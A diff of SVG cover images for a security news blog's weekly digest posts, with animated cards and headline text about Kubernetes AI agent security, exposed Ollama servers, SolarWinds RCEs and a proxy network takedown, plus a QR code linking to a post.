+  <rect x="0" y="420" width="1200" height="210" fill="url(#hexGrid)" opacity="0.6"/>
+  <rect x="0" y="420" width="8" height="210" fill="#818CF8"/>
+
+  <g filter="url(#textShadow)">
+    <text x="30" y="464" font-family="Inter, Helvetica, Arial, sans-serif" font-size="18" font-weight="700" letter-spacing="2.4" fill="#818CF8">K8s AI AGENT SECURITY</text>
+    <text x="30" y="506" font-family="Inter, Helvetica, Arial, sans-serif" font-size="36" font-weight="800" fill="#F5F7FA">Kubernetes : eBPF Runtime Guard</text>
+    <text x="30" y="538" font-family="Inter, Helvetica, Arial, sans-serif" font-size="20" font-weight="600" fill="#A5B4FC">Non-deterministic agents : API governance</text>
+    <text x="30" y="566" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="500" fill="#C7D2FE">Tigera : eBPF kernel intercept : NHI identity : least-privilege RBAC</text>
+  </g>
+
+  <!-- Central illustration: K8s pod + eBPF shield -->
+  <g transform="translate(630,525)">
+    <circle cx="0" cy="0" r="70" fill="url(#ebpfGlow)">
+      <animate attributeName="r" values="55;80;55" dur="3.8s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0.4;0.8;0.4" dur="3.8s" repeatCount="indefinite"/>
+    </circle>
+    <polygon points="0,-55 48,-27 48,27 0,55 -48,27 -48,-27" fill="#0D1230" stroke="#818CF8" stroke-width="2" filter="url(#softShadow)"/>
+    <text x="0" y="-10" text-anchor="middle" font-family="Inter, monospace" font-size="11" font-weight="800" fill="#818CF8">K8s</text>
+    <text x="0" y="8" text-anchor="middle" font-family="Inter, monospace" font-size="10" fill="#A5B4FC">AI AGENT</text>
+    <text x="0" y="24" text-anchor="middle" font-family="Inter, monospace" font-size="10" fill="#A5B4FC">POD</text>
+    <polygon points="100,-40 130,-20 130,20 100,40 70,20 70,-20" fill="#0D122A" stroke="#6366F1" stroke-width="1.8"/>
+    <text x="100" y="-2" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#818CF8">eBPF</text>
+    <text x="100" y="14" text-anchor="middle" font-family="Inter, monospace" font-size="9" fill="#A5B4FC">GUARD</text>
+    <line x1="48" y1="0" x2="70" y2="0" stroke="#6366F1" stroke-width="1.5" stroke-dasharray="3 2">
+      <animate attributeName="stroke-dashoffset" values="0;-10" dur="0.8s" repeatCount="indefinite"/>
+    </line>
+    <circle cx="-75" cy="-30" r="12" fill="#0D1230" stroke="#818CF8" stroke-width="1.2"/>
+    <text x="-75" y="-26" text-anchor="middle" font-family="Inter, monospace" font-size="8" fill="#A5B4FC">SVC</text>
+    <circle cx="-75" cy="30" r="12" fill="#0D1230" stroke="#818CF8" stroke-width="1.2"/>
+    <text x="-75" y="34" text-anchor="middle" font-family="Inter, monospace" font-size="8" fill="#A5B4FC">NHI</text>
+    <line x1="-63" y1="-27" x2="-48" y2="-15" stroke="#818CF8" stroke-width="1" stroke-opacity="0.6"/>
+    <line x1="-63" y1="27" x2="-48" y2="15" stroke="#818CF8" stroke-width="1" stroke-opacity="0.6"/>
+    <path d="M-90 65 L170 65" stroke="#4338CA" stroke-width="1" stroke-dasharray="5 4" opacity="0.7"/>
+    <text x="-90" y="80" font-family="Inter, monospace" font-size="9" fill="#6366F1">KERNEL LAYER</text>
+    <circle cx="-20" cy="65" r="3" fill="#818CF8"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.4s" repeatCount="indefinite"/></circle>
+    <circle cx="20" cy="65" r="3" fill="#818CF8"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.6s" begin="0.3s" repeatCount="indefinite"/></circle>
+    <circle cx="60" cy="65" r="3" fill="#818CF8"><animate attributeName="opacity" values="0.2;1;0.2" dur="1.8s" begin="0.6s" repeatCount="indefinite"/></circle>
+  </g>
+
+  <!-- Right KPI card -->
+  <g transform="translate(990,525)" filter="url(#softShadow)">
+    <rect x="-80" y="-65" width="180" height="125" rx="14" fill="#080A1E" stroke="#818CF8" stroke-width="2.2"/>
+    <text x="10" y="-30" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="700" letter-spacing="2" fill="#818CF8">SOURCES</text>
+    <text x="10" y="20" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="52" font-weight="900" fill="#F5F7FA">47</text>
+    <text x="10" y="44" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#A5B4FC">RSS feeds : 218 items</text>
+    <text x="10" y="58" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="11" font-weight="500" fill="#6366F1">48hr coverage</text>
+  </g>
+
+  <circle cx="260" cy="600" r="1.5" fill="#818CF8"><animate attributeName="opacity" values="0;1;0" dur="1.5s" repeatCount="indefinite"/></circle>
+  <circle cx="330" cy="600" r="1.5" fill="#818CF8"><animate attributeName="opacity" values="0;1;0" dur="1.7s" begin="0.2s" repeatCount="indefinite"/></circle>
+  <circle cx="400" cy="600" r="1.5" fill="#818CF8"><animate attributeName="opacity" values="0;1;0" dur="2.0s" begin="0.4s" repeatCount="indefinite"/></circle>
+  <rect x="820" y="448" width="4" height="4" rx="1" fill="#818CF8"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.5s" repeatCount="indefinite"/></rect>
+  <rect x="840" y="448" width="4" height="4" rx="1" fill="#818CF8"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.3s" begin="0.4s" repeatCount="indefinite"/></rect>
+</g>
+
+<!-- Band dividers -->
+<line x1="0" y1="210" x2="1200" y2="210" stroke="#1E2A3A" stroke-width="1.5"/>
+<line x1="0" y1="420" x2="1200" y2="420" stroke="#1E2A3A" stroke-width="1.5"/>
+
+<!-- cover-qr: https://tech.2twodragon.com/posts/2026/01/29/Tech_Security_Weekly_Digest_n8n_RCE_D_Link_Zero_Day_Kubernetes_AI_Agent/ : 45x45 -->
+<g transform="translate(1080,504)" filter="url(#softShadow)">
+  <rect x="-8" y="-8" width="100" height="100" rx="6" fill="#FFFFFF"/>
+  <g transform="scale(1.866667)" fill="#0A1020">
+    <path d="M0 0h7v1h-7zM8 0h5v1h-5zM14 0h1v1h-1zM16 0h1v1h-1zM18 0h1v1h-1zM20 0h4v1h-4zM26 0h1v1h-1zM30 0h2v1h-2zM33 0h1v1h-1zM36 0h1v1h-1zM38 0h7v1h-7zM0 1h1v1h-1zM6 1h1v1h-1zM8 1h2v1h-2zM11 1h8v1h-8zM22 1h8v1h-8zM31 1h3v1h-3zM35 1h1v1h-1zM38 1h1v1h-1zM44 1h1v1h-1zM0 2h1v1h-1zM2 2h3v1h-3zM6 2h1v1h-1zM8 2h2v1h-2zM13 2h1v1h-1zM16 2h3v1h-3zM20 2h1v1h-1zM22 2h1v1h-1zM25 2h1v1h-1zM28 2h2v1h-2zM32 2h2v1h-2zM35 2h1v1h-1zM38 2h1v1h-1zM40 2h3v1h-3zM44 2h1v1h-1zM0 3h1v1h-1zM2 3h3v1h-3zM6 3h1v1h-1zM10 3h2v1h-2zM17 3h3v1h-3zM23 3h1v1h-1zM25 3h5v1h-5zM31 3h3v1h-3zM35 3h2v1h-2zM38 3h1v1h-1zM40 3h3v1h-3zM44 3h1v1h-1zM0 4h1v1h-1zM2 4h3v1h-3zM6 4h1v1h-1zM8 4h2v1h-2zM12 4h1v1h-1zM16 4h1v1h-1zM19 4h8v1h-8zM28 4h1v1h-1zM30 4h3v1h-3zM34 4h3v1h-3zM38 4h1v1h-1zM40 4h3v1h-3zM44 4h1v1h-1zM0 5h1v1h-1zM6 5h1v1h-1zM10 5h2v1h-2zM13 5h6v1h-6zM20 5h1v1h-1zM24 5h1v1h-1zM26 5h2v1h-2zM30 5h2v1h-2zM33 5h1v1h-1zM38 5h1v1h-1zM44 5h1v1h-1zM0 6h7v1h-7zM8 6h1v1h-1zM10 6h1v1h-1zM12 6h1v1h-1zM14 6h1v1h-1zM16 6h1v1h-1zM18 6h1v1h-1zM20 6h1v1h-1zM22 6h1v1h-1zM24 6h1v1h-1zM26 6h1v1h-1zM28 6h1v1h-1zM30 6h1v1h-1zM32 6h1v1h-1zM34 6h1v1h-1zM36 6h1v1h-1zM38 6h7v1h-7zM9 7h1v1h-1zM11 7h1v1h-1zM13 7h6v1h-6zM20 7h1v1h-1zM24 7h3v1h-3zM28 7h2v1h-2zM31 7h1v1h-1zM33 7h1v1h-1zM35 7h2v1h-2zM0 8h1v1h-1zM3 8h6v1h-6zM10 8h1v1h-1zM12 8h1v1h-1zM18 8h1v1h-1zM20 8h5v1h-5zM28 8h1v1h-1zM33 8h3v1h-3zM37 8h1v1h-1zM40 8h1v1h-1zM42 8h3v1h-3zM2 9h1v1h-1zM5 9h1v1h-1zM7 9h2v1h-2zM10 9h3v1h-3zM14 9h1v1h-1zM17 9h3v1h-3zM21 9h1v1h-1zM25 9h2v1h-2zM29 9h2v1h-2zM32 9h5v1h-5zM38 9h2v1h-2zM41 9h3v1h-3zM0 10h1v1h-1zM3 10h1v1h-1zM6 10h1v1h-1zM8 10h3v1h-3zM13 10h2v1h-2zM16 10h3v1h-3zM20 10h5v1h-5zM27 10h1v1h-1zM30 10h1v1h-1zM33 10h2v1h-2zM36 10h2v1h-2zM39 10h1v1h-1zM41 10h4v1h-4zM2 11h4v1h-4zM7 11h1v1h-1zM9 11h1v1h-1zM17 11h8v1h-8zM28 11h3v1h-3zM32 11h1v1h-1zM34 11h1v1h-1zM36 11h1v1h-1zM40 11h1v1h-1zM42 11h1v1h-1zM5 12h2v1h-2zM13 12h4v1h-4zM18 12h2v1h-2zM21 12h1v1h-1zM24 12h1v1h-1zM28 12h1v1h-1zM31 12h4v1h-4zM37 12h2v1h-2zM40 12h1v1h-1zM43 12h1v1h-1zM0 13h3v1h-3zM4 13h2v1h-2zM7 13h1v1h-1zM9 13h1v1h-1zM13 13h1v1h-1zM16 13h1v1h-1zM21 13h2v1h-2zM26 13h5v1h-5zM32 13h1v1h-1zM36 13h5v1h-5zM43 13h2v1h-2zM1 14h4v1h-4zM6 14h4v1h-4zM14 14h1v1h-1zM16 14h5v1h-5zM23 14h4v1h-4zM29 14h4v1h-4zM35 14h1v1h-1zM38 14h1v1h-1zM41 14h1v1h-1zM0 15h2v1h-2zM4 15h2v1h-2zM7 15h4v1h-4zM17 15h1v1h-1zM19 15h2v1h-2zM22 15h10v1h-10zM34 15h2v1h-2zM37 15h2v1h-2zM40 15h4v1h-4zM3 16h4v1h-4zM11 16h1v1h-1zM14 16h1v1h-1zM18 16h1v1h-1zM21 16h1v1h-1zM23 16h1v1h-1zM26 16h1v1h-1zM29 16h2v1h-2zM32 16h1v1h-1zM34 16h1v1h-1zM38 16h1v1h-1zM41 16h1v1h-1zM43 16h1v1h-1zM2 17h1v1h-1zM5 17h1v1h-1zM7 17h1v1h-1zM10 17h5v1h-5zM17 17h1v1h-1zM20 17h1v1h-1zM22 17h1v1h-1zM25 17h1v1h-1zM27 17h2v1h-2zM30 17h1v1h-1zM32 17h3v1h-3zM36 17h2v1h-2zM39 17h1v1h-1zM42 17h1v1h-1zM44 17h1v1h-1zM0 18h1v1h-1zM4 18h1v1h-1zM6 18h1v1h-1zM8 18h3v1h-3zM13 18h1v1h-1zM17 18h2v1h-2zM20 18h1v1h-1zM24 18h1v1h-1zM26 18h1v1h-1zM28 18h1v1h-1zM37 18h1v1h-1zM41 18h2v1h-2zM44 18h1v1h-1zM1 19h1v1h-1zM4 19h2v1h-2zM13 19h3v1h-3zM20 19h2v1h-2zM23 19h2v1h-2zM26 19h2v1h-2zM29 19h3v1h-3zM35 19h1v1h-1zM37 19h1v1h-1zM39 19h4v1h-4zM44 19h1v1h-1zM1 20h2v1h-2zM4 20h5v1h-5zM10 20h1v1h-1zM13 20h6v1h-6zM20 20h5v1h-5zM26 20h1v1h-1zM28 20h1v1h-1zM30 20h1v1h-1zM33 20h1v1h-1zM36 20h5v1h-5zM0 21h3v1h-3zM4 21h1v1h-1zM8 21h1v1h-1zM10 21h1v1h-1zM12 21h2v1h-2zM16 21h1v1h-1zM20 21h1v1h-1zM24 21h3v1h-3zM28 21h3v1h-3zM32 21h5v1h-5zM40 21h4v1h-4zM0 22h1v1h-1zM4 22h1v1h-1zM6 22h1v1h-1zM8 22h3v1h-3zM12 22h3v1h-3zM16 22h1v1h-1zM20 22h1v1h-1zM22 22h1v1h-1zM24 22h1v1h-1zM27 22h3v1h-3zM31 22h4v1h-4zM36 22h1v1h-1zM38 22h1v1h-1zM40 22h5v1h-5zM0 23h2v1h-2zM3 23h2v1h-2zM8 23h1v1h-1zM11 23h4v1h-4zM17 23h1v1h-1zM19 23h2v1h-2zM24 23h2v1h-2zM27 23h1v1h-1zM31 23h6v1h-6zM40 23h1v1h-1zM42 23h3v1h-3zM0 24h1v1h-1zM2 24h1v1h-1zM4 24h6v1h-6zM11 24h1v1h-1zM13 24h1v1h-1zM19 24h6v1h-6zM28 24h1v1h-1zM31 24h2v1h-2zM34 24h7v1h-7zM43 24h2v1h-2zM0 25h4v1h-4zM5 25h1v1h-1zM9 25h1v1h-1zM12 25h1v1h-1zM15 25h1v1h-1zM18 25h1v1h-1zM20 25h1v1h-1zM22 25h3v1h-3zM26 25h1v1h-1zM29 25h3v1h-3zM33 25h1v1h-1zM35 25h2v1h-2zM42 25h2v1h-2zM0 26h2v1h-2zM3 26h8v1h-8zM12 26h1v1h-1zM14 26h1v1h-1zM16 26h2v1h-2zM19 26h3v1h-3zM25 26h2v1h-2zM28 26h3v1h-3zM32 26h2v1h-2zM36 26h1v1h-1zM39 26h1v1h-1zM41 26h1v1h-1zM1 27h2v1h-2zM7 27h1v1h-1zM12 27h3v1h-3zM21 27h2v1h-2zM24 27h6v1h-6zM31 27h1v1h-1zM34 27h2v1h-2zM37 27h1v1h-1zM40 27h1v1h-1zM42 27h3v1h-3zM0 28h1v1h-1zM3 28h1v1h-1zM5 28h2v1h-2zM12 28h2v1h-2zM15 28h1v1h-1zM17 28h3v1h-3zM23 28h1v1h-1zM25 28h2v1h-2zM32 28h1v1h-1zM35 28h1v1h-1zM40 28h2v1h-2zM43 28h2v1h-2zM3 29h1v1h-1zM5 29h1v1h-1zM8 29h4v1h-4zM13 29h5v1h-5zM21 29h1v1h-1zM25 29h1v1h-1zM27 29h2v1h-2zM30 29h1v1h-1zM32 29h1v1h-1zM34 29h1v1h-1zM38 29h3v1h-3zM43 29h1v1h-1zM0 30h1v1h-1zM4 30h1v1h-1zM6 30h1v1h-1zM8 30h1v1h-1zM11 30h2v1h-2zM14 30h4v1h-4zM19 30h1v1h-1zM21 30h1v1h-1zM25 30h1v1h-1zM27 30h1v1h-1zM29 30h5v1h-5zM35 30h8v1h-8zM44 30h1v1h-1zM1 31h1v1h-1zM4 31h1v1h-1zM9 31h4v1h-4zM14 31h1v1h-1zM17 31h1v1h-1zM19 31h6v1h-6zM29 31h3v1h-3zM33 31h1v1h-1zM35 31h3v1h-3zM41 31h2v1h-2zM1 32h2v1h-2zM4 32h1v1h-1zM6 32h1v1h-1zM8 32h2v1h-2zM17 32h4v1h-4zM22 32h1v1h-1zM26 32h1v1h-1zM28 32h2v1h-2zM31 32h1v1h-1zM33 32h2v1h-2zM36 32h2v1h-2zM40 32h2v1h-2zM44 32h1v1h-1zM0 33h2v1h-2zM8 33h3v1h-3zM14 33h1v1h-1zM16 33h1v1h-1zM21 33h3v1h-3zM25 33h3v1h-3zM29 33h2v1h-2zM32 33h4v1h-4zM39 33h2v1h-2zM42 33h1v1h-1zM4 34h1v1h-1zM6 34h3v1h-3zM12 34h4v1h-4zM22 34h2v1h-2zM26 34h2v1h-2zM29 34h1v1h-1zM35 34h2v1h-2zM38 34h1v1h-1zM42 34h3v1h-3zM1 35h4v1h-4zM8 35h3v1h-3zM14 35h7v1h-7zM24 35h2v1h-2zM30 35h4v1h-4zM36 35h3v1h-3zM42 35h2v1h-2zM0 36h1v1h-1zM3 36h2v1h-2zM6 36h11v1h-11zM18 36h1v1h-1zM20 36h5v1h-5zM26 36h1v1h-1zM28 36h1v1h-1zM30 36h1v1h-1zM32 36h2v1h-2zM35 36h6v1h-6zM44 36h1v1h-1zM8 37h1v1h-1zM10 37h2v1h-2zM13 37h1v1h-1zM15 37h4v1h-4zM20 37h1v1h-1zM24 37h1v1h-1zM26 37h5v1h-5zM32 37h2v1h-2zM35 37h2v1h-2zM40 37h3v1h-3zM0 38h7v1h-7zM8 38h1v1h-1zM11 38h1v1h-1zM14 38h2v1h-2zM17 38h1v1h-1zM20 38h1v1h-1zM22 38h1v1h-1zM24 38h5v1h-5zM33 38h1v1h-1zM35 38h2v1h-2zM38 38h1v1h-1zM40 38h1v1h-1zM42 38h1v1h-1zM0 39h1v1h-1zM6 39h1v1h-1zM8 39h1v1h-1zM11 39h2v1h-2zM16 39h5v1h-5zM24 39h2v1h-2zM30 39h1v1h-1zM34 39h3v1h-3zM40 39h4v1h-4zM0 40h1v1h-1zM2 40h3v1h-3zM6 40h1v1h-1zM8 40h2v1h-2zM11 40h1v1h-1zM13 40h2v1h-2zM17 40h1v1h-1zM20 40h6v1h-6zM29 40h1v1h-1zM31 40h2v1h-2zM34 40h1v1h-1zM36 40h5v1h-5zM43 40h1v1h-1zM0 41h1v1h-1zM2 41h3v1h-3zM6 41h1v1h-1zM8 41h2v1h-2zM12 41h2v1h-2zM15 41h4v1h-4zM21 41h1v1h-1zM23 41h3v1h-3zM27 41h1v1h-1zM30 41h6v1h-6zM38 41h3v1h-3zM43 41h2v1h-2zM0 42h1v1h-1zM2 42h3v1h-3zM6 42h1v1h-1zM9 42h1v1h-1zM13 42h1v1h-1zM20 42h3v1h-3zM25 42h1v1h-1zM29 42h2v1h-2zM33 42h1v1h-1zM36 42h1v1h-1zM38 42h1v1h-1zM40 42h1v1h-1zM44 42h1v1h-1zM0 43h1v1h-1zM6 43h1v1h-1zM9 43h3v1h-3zM16 43h2v1h-2zM19 43h1v1h-1zM21 43h3v1h-3zM25 43h2v1h-2zM30 43h1v1h-1zM33 43h4v1h-4zM38 43h2v1h-2zM42 43h3v1h-3zM0 44h7v1h-7zM8 44h1v1h-1zM10 44h1v1h-1zM12 44h1v1h-1zM14 44h1v1h-1zM16 44h1v1h-1zM23 44h2v1h-2zM26 44h1v1h-1zM28 44h4v1h-4zM35 44h5v1h-5zM41 44h1v1h-1z"/>
+  </g>
+</g>
+<text x="1122" y="614" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" fill="#F5F7FA" text-anchor="middle">scan / full post</text>
 </svg>

--- a/assets/images/2026-01-30-Tech_Security_Weekly_Digest_Ollama_AI_SolarWinds_RCE_Google_IPIDEA.svg
+++ b/assets/images/2026-01-30-Tech_Security_Weekly_Digest_Ollama_AI_SolarWinds_RCE_Google_IPIDEA.svg
@@ -1,134 +1,396 @@
-<svg xmlns="http://www.w3.org/2000/svg" width="1200" height="630" viewBox="0 0 1200 630">
-  <title>Security Weekly Digest - January 30, 2026</title>
-  <defs>
-    <linearGradient id="bg" x1="0%" y1="0%" x2="100%" y2="100%">
-      <stop offset="0%" stop-color="#0a0e1a"/>
-      <stop offset="60%" stop-color="#0f1628"/>
-      <stop offset="100%" stop-color="#141b2d"/>
-    </linearGradient>
-    <linearGradient id="hg" x1="0%" y1="0%" x2="100%" y2="0%">
-      <stop offset="0%" stop-color="#1e293b"/>
-      <stop offset="100%" stop-color="#0f172a"/>
-    </linearGradient>
-    <filter id="glow" x="-50%" y="-50%" width="200%" height="200%">
-      <feGaussianBlur stdDeviation="18"/>
-    </filter>
-    <marker id="ar" markerWidth="8" markerHeight="8" refX="4" refY="4" orient="auto">
-      <path d="M0,0 L8,4 L0,8 Z" fill="#ef4444" opacity="0.7"/>
-    </marker>
-  </defs>
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" width="1200" height="630" role="img" aria-label="Research-based weekly digest cover: Ollama AI 175K servers exposed LLMjacking, SolarWinds WHD 6 RCEs CVSS 9.8, Google GTIG IPIDEA 6.1M proxy takedown, Microsoft AI threat detection automation">
+<!-- profile: high-quality-cover (L13 Callouts, research-based, batch1-locked) -->
+<title>Weekly digest 2026-01-30: Ollama 175K LLMjacking, SolarWinds WHD RCE x6, Google IPIDEA 6.1M, Microsoft AI SecOps</title>
+<defs>
+  <linearGradient id="bgSpread" x1="0%" y1="0%" x2="100%" y2="100%">
+    <stop offset="0%" stop-color="#0A1226"/>
+    <stop offset="55%" stop-color="#0D1530"/>
+    <stop offset="100%" stop-color="#131038"/>
+  </linearGradient>
+  <linearGradient id="cardA" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#2A0F16"/>
+    <stop offset="100%" stop-color="#1E0A12"/>
+  </linearGradient>
+  <linearGradient id="cardB" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#2A1208"/>
+    <stop offset="100%" stop-color="#1E0D05"/>
+  </linearGradient>
+  <linearGradient id="cardC" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#1A1A00"/>
+    <stop offset="100%" stop-color="#111100"/>
+  </linearGradient>
+  <linearGradient id="cardD" x1="0%" y1="0%" x2="0%" y2="100%">
+    <stop offset="0%" stop-color="#0E2038"/>
+    <stop offset="100%" stop-color="#0A1830"/>
+  </linearGradient>
+  <radialGradient id="glowRed" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#E63946" stop-opacity="0.5"/>
+    <stop offset="100%" stop-color="#E63946" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowOrange" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#FF6B2B" stop-opacity="0.5"/>
+    <stop offset="100%" stop-color="#FF6B2B" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowAmber" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#FFB703" stop-opacity="0.45"/>
+    <stop offset="100%" stop-color="#FFB703" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="glowBlue" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#3A86FF" stop-opacity="0.45"/>
+    <stop offset="100%" stop-color="#3A86FF" stop-opacity="0"/>
+  </radialGradient>
+  <pattern id="dotGrid" x="0" y="0" width="40" height="40" patternUnits="userSpaceOnUse">
+    <circle cx="20" cy="20" r="0.8" fill="#2A3256" opacity="0.55"/>
+  </pattern>
+  <filter id="softShadow" x="-10%" y="-10%" width="130%" height="130%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="2.6"/>
+    <feOffset dx="1" dy="3"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.55"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <filter id="textShadow" x="-5%" y="-5%" width="110%" height="110%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="1.2"/>
+    <feOffset dx="0" dy="1.5"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.8"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+</defs>
 
-  <rect width="1200" height="630" fill="url(#bg)"/>
+<!-- Background -->
+<rect width="1200" height="630" fill="url(#bgSpread)"/>
+<rect width="1200" height="630" fill="url(#dotGrid)"/>
 
-  <!-- Grid -->
-  <g opacity="0.04" stroke="#94a3b8" stroke-width="0.5">
-    <line x1="0" y1="105" x2="1200" y2="105"/><line x1="0" y1="210" x2="1200" y2="210"/>
-    <line x1="0" y1="315" x2="1200" y2="315"/><line x1="0" y1="420" x2="1200" y2="420"/>
-    <line x1="0" y1="525" x2="1200" y2="525"/>
-    <line x1="240" y1="0" x2="240" y2="630"/><line x1="480" y1="0" x2="480" y2="630"/>
-    <line x1="720" y1="0" x2="720" y2="630"/><line x1="960" y1="0" x2="960" y2="630"/>
+<!-- Ambient glow per card quadrant -->
+<circle cx="316" cy="224" r="130" fill="url(#glowRed)">
+  <animate attributeName="opacity" values="0.5;0.9;0.5" dur="6.2s" repeatCount="indefinite"/>
+</circle>
+<circle cx="896" cy="224" r="130" fill="url(#glowOrange)">
+  <animate attributeName="opacity" values="0.45;0.85;0.45" dur="5.4s" repeatCount="indefinite"/>
+</circle>
+<circle cx="316" cy="474" r="130" fill="url(#glowAmber)">
+  <animate attributeName="opacity" values="0.4;0.75;0.4" dur="6.8s" repeatCount="indefinite"/>
+</circle>
+<circle cx="896" cy="474" r="130" fill="url(#glowBlue)">
+  <animate attributeName="opacity" values="0.4;0.78;0.4" dur="5.8s" repeatCount="indefinite"/>
+</circle>
+
+<!-- Header stripe -->
+<rect x="0" y="0" width="1200" height="56" fill="#050813" opacity="0.93"/>
+<text x="36" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="18" font-weight="700" fill="#8FB8FF" letter-spacing="2.5">WEEKLY DIGEST</text>
+<text x="1164" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="600" fill="#7DA3D9" letter-spacing="1.5" text-anchor="end">2026.01.30</text>
+<!-- Animated accent line -->
+<rect x="0" y="54" width="1200" height="2" fill="#E63946" opacity="0.85">
+  <animate attributeName="opacity" values="0.4;1;0.4" dur="4.6s" repeatCount="indefinite"/>
+</rect>
+
+<!-- ======================================= -->
+<!-- CARD 01: Ollama 175K Exposed (top-left) -->
+<!-- ======================================= -->
+<g transform="translate(32,80)">
+  <rect x="0" y="0" width="564" height="248" rx="14" fill="url(#cardA)" stroke="#E63946" stroke-width="1.6" opacity="0.97"/>
+  <rect x="0" y="0" width="6" height="248" rx="3" fill="#E63946"/>
+  <rect x="0" y="0" width="564" height="4" fill="#E63946" opacity="0.7"/>
+
+  <!-- Number badge -->
+  <g transform="translate(20,18)">
+    <rect x="0" y="0" width="40" height="40" rx="6" fill="#E63946" opacity="0.22"/>
+    <text x="20" y="28" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="22" font-weight="900" fill="#F87171">01</text>
   </g>
 
-  <!-- Glow orbs -->
-  <circle cx="200" cy="300" r="200" fill="#ef4444" opacity="0.06" filter="url(#glow)"/>
-  <circle cx="600" cy="350" r="180" fill="#f59e0b" opacity="0.05" filter="url(#glow)"/>
-  <circle cx="1000" cy="300" r="180" fill="#3b82f6" opacity="0.06" filter="url(#glow)"/>
-
-  <!-- Header -->
-  <rect x="0" y="0" width="1200" height="80" fill="url(#hg)" opacity="0.9"/>
-  <rect x="0" y="78" width="1200" height="2" fill="#334155" opacity="0.8"/>
-  <g transform="translate(48,40)">
-    <path d="M0,-22 L18,-12 L18,3 C18,13 10,20 0,24 C-10,20 -18,13 -18,3 L-18,-12 Z" fill="#1e3a5f" stroke="#3b82f6" stroke-width="1.5"/>
-    <path d="M-7,1 L-2,6 L8,-5" stroke="#3b82f6" stroke-width="2.5" fill="none" stroke-linecap="round"/>
+  <!-- Eyebrow + Title -->
+  <g filter="url(#textShadow)">
+    <text x="74" y="36" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="700" fill="#F87171" letter-spacing="2.4">CRITICAL  /  AI EXPOSURE</text>
+    <text x="74" y="60" font-family="Inter, Helvetica, Arial, sans-serif" font-size="21" font-weight="800" fill="#F5F7FA">Ollama 175K Servers Exposed</text>
   </g>
-  <text x="80" y="44" font-family="Arial,sans-serif" font-size="28" font-weight="700" fill="#f1f5f9">Security Weekly Digest</text>
-  <rect x="990" y="18" width="178" height="44" rx="6" fill="#1e293b" stroke="#334155" stroke-width="1"/>
-  <text x="1079" y="48" font-family="Arial,sans-serif" font-size="15" font-weight="700" fill="#94a3b8" text-anchor="middle">January 30, 2026</text>
+  <!-- Subtitle -->
+  <text x="20" y="100" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="500" fill="#FBB6BD">LLMjacking campaign: 130 countries, no authentication</text>
 
-  <!-- Card 1: AI AGENT -->
-  <rect x="32" y="100" width="220" height="120" rx="8" fill="#1a0505" stroke="#ef4444" stroke-width="1.5"/>
-  <circle cx="52" cy="120" r="6" fill="#ef4444"/>
-  <g transform="translate(142,148)">
-    <circle cx="-12" cy="-8" r="4" fill="none" stroke="#ef4444" stroke-width="1.5"/><circle cx="12" cy="-8" r="4" fill="none" stroke="#ef4444" stroke-width="1.5"/><circle cx="0" cy="8" r="5" fill="none" stroke="#ef4444" stroke-width="1.8"/><line x1="-8" y1="-6" x2="-2" y2="6" stroke="#ef4444" stroke-width="1.2" opacity="0.7"/><line x1="8" y1="-6" x2="2" y2="6" stroke="#ef4444" stroke-width="1.2" opacity="0.7"/><line x1="-8" y1="-8" x2="8" y2="-8" stroke="#ef4444" stroke-width="1.2" opacity="0.5"/>
+  <!-- Server rack illustration -->
+  <g transform="translate(24,116)" filter="url(#softShadow)">
+    <rect x="0" y="0" width="76" height="100" rx="4" fill="#1A0A0E" stroke="#E63946" stroke-width="1.6"/>
+    <rect x="5" y="6"  width="66" height="13" rx="2" fill="#2A1218"/>
+    <rect x="5" y="23" width="66" height="13" rx="2" fill="#2A1218"/>
+    <rect x="5" y="40" width="66" height="13" rx="2" fill="#2A1218"/>
+    <rect x="5" y="57" width="66" height="13" rx="2" fill="#2A1218"/>
+    <rect x="5" y="74" width="66" height="13" rx="2" fill="#3A0A10"/>
+    <circle cx="64" cy="13" r="3" fill="#F87171"><animate attributeName="opacity" values="0.3;1;0.3" dur="0.8s" repeatCount="indefinite"/></circle>
+    <circle cx="64" cy="30" r="3" fill="#F87171"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.1s" begin="0.2s" repeatCount="indefinite"/></circle>
+    <circle cx="64" cy="47" r="3" fill="#F87171"><animate attributeName="opacity" values="0.3;1;0.3" dur="0.9s" begin="0.4s" repeatCount="indefinite"/></circle>
